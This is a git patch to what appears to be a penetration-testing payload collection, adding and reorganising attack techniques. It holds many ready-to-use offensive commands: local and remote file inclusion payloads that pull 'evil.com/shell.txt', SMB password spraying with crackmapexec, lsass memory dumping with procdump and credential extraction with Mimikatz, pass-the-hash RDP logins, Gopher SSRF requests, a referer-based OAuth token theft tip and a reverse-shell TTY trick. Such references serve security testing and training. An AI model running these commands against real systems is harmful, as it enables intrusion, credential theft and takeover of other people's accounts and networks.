From bab04f85879214dfe9366e9596f24e28872b05f1 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 12 May 2019 21:34:09 +0200 Subject: [PATCH] Masscan + AD password in description + ZSH revshell bugfix + Mimikatz lsass.dmp --- File Inclusion/README.md | 20 +++-- .../Active Directory Attack.md | 12 ++- .../Methodology_and_enumeration.md | 8 ++ .../Network Discovery.md | 81 +++++++++++-------- .../Reverse Shell Cheatsheet.md | 9 +++ .../Windows - Mimikatz.md | 19 +++++ .../Windows - Using credentials.md | 16 ++-- OAuth/README.md | 18 ++++- README.md | 2 +- Server Side Request Forgery/README.md | 7 ++ XSS Injection/README.md | 1 - 11 files changed, 144 insertions(+), 49 deletions(-) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 2d8e3d4..1f48d44 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -7,6 +7,10 @@ ## Summary * [Basic LFI](#basic-lfi) + * [Null byte](#null-byte) + * [Double encoding](#double-encoding) + * [Path truncation](#path-truncation) + * [Filter bypass tricks](#filter-bypass-tricks) * [Basic RFI](#basic-rfi) * [LFI / RFI using wrappers](#lfi--rfi-using-wrappers) * [Wrapper php://filter](#wrapper-phpfilter) @@ -31,27 +35,30 @@ In the following examples we include the `/etc/passwd` file, check the `Director http://example.com/index.php?page=../../../etc/passwd ``` -Null byte +### Null byte ```powershell http://example.com/index.php?page=../../../etc/passwd%00 ``` -Double encoding +### Double encoding ```powershell http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00 ``` -Path truncation +### Path truncation + +On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away. ```powershell http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\. +http://example.com/index.php?page=../../../etc/passwd/././././././././/././././././././././[ADD MORE] http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd ``` -Filter bypass tricks +### Filter bypass tricks ```powershell http://example.com/index.php?page=....//....//etc/passwd @@ -65,13 +72,13 @@ http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C http://example.com/index.php?page=http://evil.com/shell.txt ``` -Null byte +### Null byte ```powershell http://example.com/index.php?page=http://evil.com/shell.txt%00 ``` -Double encoding +### Double encoding ```powershell http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt @@ -285,3 +292,4 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s * [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/) * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf) * [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/) +* [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 7c7e7d5..30de1a2 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -307,6 +307,8 @@ cme smb 10.10.0.202 -u username -p password --ntds vss enum4linux | grep -i desc There are 3-4 fields that seem to be common in most AD schemas: UserPassword, UnixUserPassword, unicodePwd and msSFU30Password. + +Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID ``` ### PassTheTicket Golden Tickets @@ -563,13 +565,21 @@ Alternatively you can use the Metasploit module ### Password spraying -Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. +Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. + +Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. ```powershell root@kali:~$ ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt root@kali:~$ ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123 ``` +Using `crackmapexec` and `mp64` to generate passwords and spray them against SMB services on the network. + +```powershell +crackmapexec smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)` +``` + Most of the time the best passwords to spray are : - Password1 diff --git a/Methodology and Resources/Methodology_and_enumeration.md b/Methodology and Resources/Methodology_and_enumeration.md index 675c08c..65cd22d 100644 --- a/Methodology and Resources/Methodology_and_enumeration.md +++ b/Methodology and Resources/Methodology_and_enumeration.md @@ -8,6 +8,7 @@ * The Harvester * [Active Recon](#active-recon) + * Masscan * Nmap * Nmap Script * RPCClient @@ -47,6 +48,13 @@ ## Active recon +* Masscan + +```powershell +masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out +masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000 +``` + * Basic NMAP ```bash diff --git a/Methodology and Resources/Network Discovery.md b/Methodology and Resources/Network Discovery.md index cd53bae..1a0b976 100644 --- a/Methodology and Resources/Network Discovery.md +++ b/Methodology and Resources/Network Discovery.md @@ -1,38 +1,14 @@ # Network Discovery -## Netdiscover +## Summary -```powershell -netdiscover -i eth0 -r 192.168.1.0/24 -Currently scanning: Finished! | Screen View: Unique Hosts - -20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 876 -_____________________________________________________________________________ -IP At MAC Address Count Len MAC Vendor / Hostname ------------------------------------------------------------------------------ -192.168.1.AA 68:AA:AA:AA:AA:AA 15 630 Sagemcom -192.168.1.XX 52:XX:XX:XX:XX:XX 1 60 Unknown vendor -192.168.1.YY 24:YY:YY:YY:YY:YY 1 60 QNAP Systems, Inc. -192.168.1.ZZ b8:ZZ:ZZ:ZZ:ZZ:ZZ 3 126 HUAWEI TECHNOLOGIES CO.,LTD -``` - -## Responder - -```powershell -responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding. -responder.py -I eth0 -wrf -``` - -Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows) - -## Bettercap - -```powershell -bettercap -X --proxy --proxy-https -T -# better cap in spoofing, discovery, sniffer -# intercepting http and https requests, -# targetting specific IP only -``` +- [Nmap](#nmap) +- [Masscan](#masscan) +- [Netdiscover](#netdiscover) +- [Responder](#responder) +- [Bettercap](#bettercap) +- [Reconnoitre](#reconnoitre) +- [References](#references) ## Nmap @@ -121,6 +97,13 @@ Host script results: List Nmap scripts : ls /usr/share/nmap/scripts/ ``` +## Masscan + +```powershell +masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out +masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000 +``` + ## Reconnoitre Dependencies: @@ -135,6 +118,40 @@ python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostna If you have a segfault with nbtscan, read the following quote. > Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255 +## Netdiscover + +```powershell +netdiscover -i eth0 -r 192.168.1.0/24 +Currently scanning: Finished! | Screen View: Unique Hosts + +20 Captured ARP Req/Rep packets, from 4 hosts. Total size: 876 +_____________________________________________________________________________ +IP At MAC Address Count Len MAC Vendor / Hostname +----------------------------------------------------------------------------- +192.168.1.AA 68:AA:AA:AA:AA:AA 15 630 Sagemcom +192.168.1.XX 52:XX:XX:XX:XX:XX 1 60 Unknown vendor +192.168.1.YY 24:YY:YY:YY:YY:YY 1 60 QNAP Systems, Inc. +192.168.1.ZZ b8:ZZ:ZZ:ZZ:ZZ:ZZ 3 126 HUAWEI TECHNOLOGIES CO.,LTD +``` + +## Responder + +```powershell +responder -I eth0 -A # see NBT-NS, BROWSER, LLMNR requests without responding. +responder.py -I eth0 -wrf +``` + +Alternatively you can use the [Windows version](https://github.com/lgandx/Responder-Windows) + +## Bettercap + +```powershell +bettercap -X --proxy --proxy-https -T +# better cap in spoofing, discovery, sniffer +# intercepting http and https requests, +# targetting specific IP only +``` + ## References * [TODO](TODO) \ No newline at end of file diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 1eccf12..41435de 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -234,13 +234,22 @@ Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new ## Spawn TTY Shell Access shortcuts, su, nano and autocomplete in a partially tty shell + /!\ OhMyZSH might break this trick, a simple `sh` is recommended +> The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect + ```powershell ctrl+z echo $TERM && tput lines && tput cols + +# for bash stty raw -echo fg + +# for zsh +stty raw -echo; fg + reset export SHELL=bash export TERM=xterm-256color diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md index 6df9c14..9e1f869 100644 --- a/Methodology and Resources/Windows - Mimikatz.md +++ b/Methodology and Resources/Windows - Mimikatz.md @@ -26,6 +26,25 @@ mimikatz_command -f sekurlsa::logonPasswords full mimikatz_command -f sekurlsa::wdigest ``` +## Mimikatz - Mini Dump + +Dump the lsass process. + +```powershell +C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp + +net use Z: https://live.sysinternals.com +Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp +``` + +Then load it inside Mimikatz. + +```powershell +mimikatz # sekurlsa::minidump lsass.dmp +Switch to minidump +mimikatz # sekurlsa::logonPasswords +``` + ## Mimikatz Golden ticket ```powershell diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 92378f9..a2d0ed3 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -119,18 +119,20 @@ or with crackmapexec crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable ``` -For Server 2012 R2, Win8.1+ - -```powershell -xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:192.168.1.12 -``` - -with Metasploit +or with Metasploit ```powershell run getgui -u admin -p 1234 ``` +Then log in using xfreerdp + +```powershell +xfreerdp /u:offsec /d:win2012 /pth:88a405e17c0aa5debbc9b5679753939d /v:10.0.0.1 # pass the hash works for Server 2012 R2 / Win 8.1+ + xfreerd /u:runner /v:10.0.0.1 # password will be asked +``` + + ## Netuse (Windows) ```powershell diff --git a/OAuth/README.md b/OAuth/README.md index 7df46e6..4e728c5 100644 --- a/OAuth/README.md +++ b/OAuth/README.md @@ -1,4 +1,20 @@ -# OAuth 2 - Common vulnerabilities +# OAuth + +## Summary + +- [Stealing OAuth Token via referer](#stealing-oauth-token-via-referer) +- [Grabbing OAuth Token via redirect_uri](#grabbing-oauth-token-via-redirect---uri) +- [Executing XSS via redirect_uri](#executing-xss-via-redirect---uri) +- [OAuth private key disclosure](#oauth-private-key-disclosure) +- [Authorization Code Rule Violation](#authorization-code-rule-violation) +- [Cross-Site Request Forgery](#cross-site-request-forgery) +- [References](#references) + +## Stealing OAuth Token via referer + +From [@abugzlife1](https://twitter.com/abugzlife1/status/1125663944272748544) tweet. + +> Do you have HTML injection but can't get XSS? Are there any OAuth implementations on the site? If so, setup an img tag to your server and see if there's a way to get the victim there (redirect, etc.) after login to steal OAuth tokens via referer ## Grabbing OAuth Token via redirect_uri diff --git a/README.md b/README.md index be60cf8..9af9fce 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,7 @@ A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques ! -I <3 pull requests :) +I :heart: pull requests :) You can also contribute with a beer IRL or with `buymeacoffee.com` diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 0c9090a..4d01e10 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -277,6 +277,13 @@ You didn't say the magic word ! QUIT ``` +#### Gopher HTTP + +```powershell +gopher://:8080/_GET http:///x HTTP/1.1%0A%0A +gopher://:8080/_POST%20http://:80/x%20HTTP/1.1%0ACookie:%20eatme%0A%0AI+am+a+post+body +``` + #### Gopher SMTP - Back connect to 1337 ```php diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 29bc724..23b8b18 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -930,7 +930,6 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [Three Stored XSS in Facebook](http://www.breaksec.com/?p=6129) by Nirgoldshlager - [Using a Braun Shaver to Bypass XSS Audit and WAF](https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify) by Frans Rosen - [An XSS on Facebook via PNGs & Wonky Content Types](https://whitton.io/articles/xss-on-facebook-via-png-content-types/) by Jack Whitton - - he is able to make stored XSS from a irrelevant domain to main facebook domain - [Stored XSS in *.ebay.com](https://whitton.io/archive/persistent-xss-on-myworld-ebay-com/) by Jack Whitton - [Complicated, Best Report of Google XSS](https://sites.google.com/site/bughunteruniversity/best-reports/account-recovery-xss) by Ramzes - [Tricky Html Injection and Possible XSS in sms-be-vip.twitter.com](https://hackerone.com/reports/150179) by secgeek